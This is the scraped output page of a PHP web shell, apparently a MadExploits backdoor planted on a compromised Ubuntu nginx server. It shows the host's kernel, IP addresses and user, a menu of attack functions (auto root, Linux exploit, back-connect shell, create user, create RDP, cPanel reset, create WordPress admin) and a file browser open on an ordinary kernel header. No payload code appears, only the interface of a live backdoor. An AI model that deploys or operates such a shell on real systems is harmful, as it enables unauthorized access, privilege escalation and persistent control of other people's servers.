Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-160 /
include /
xen /
arm /
[ HOME SHELL ]
Name
Size
Permission
Action
hypercall.h
3.38
KB
-rw-r--r--
hypervisor.h
774
B
-rw-r--r--
interface.h
2.53
KB
-rw-r--r--
page-coherent.h
613
B
-rw-r--r--
page.h
3.05
KB
-rw-r--r--
swiotlb-xen.h
431
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-coherent.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _XEN_ARM_PAGE_COHERENT_H #define _XEN_ARM_PAGE_COHERENT_H #include <linux/dma-mapping.h> #include <asm/page.h> static inline void *xen_alloc_coherent_pages(struct device *hwdev, size_t size, dma_addr_t *dma_handle, gfp_t flags, unsigned long attrs) { return dma_direct_alloc(hwdev, size, dma_handle, flags, attrs); } static inline void xen_free_coherent_pages(struct device *hwdev, size_t size, void *cpu_addr, dma_addr_t dma_handle, unsigned long attrs) { dma_direct_free(hwdev, size, cpu_addr, dma_handle, attrs); } #endif /* _XEN_ARM_PAGE_COHERENT_H */
Close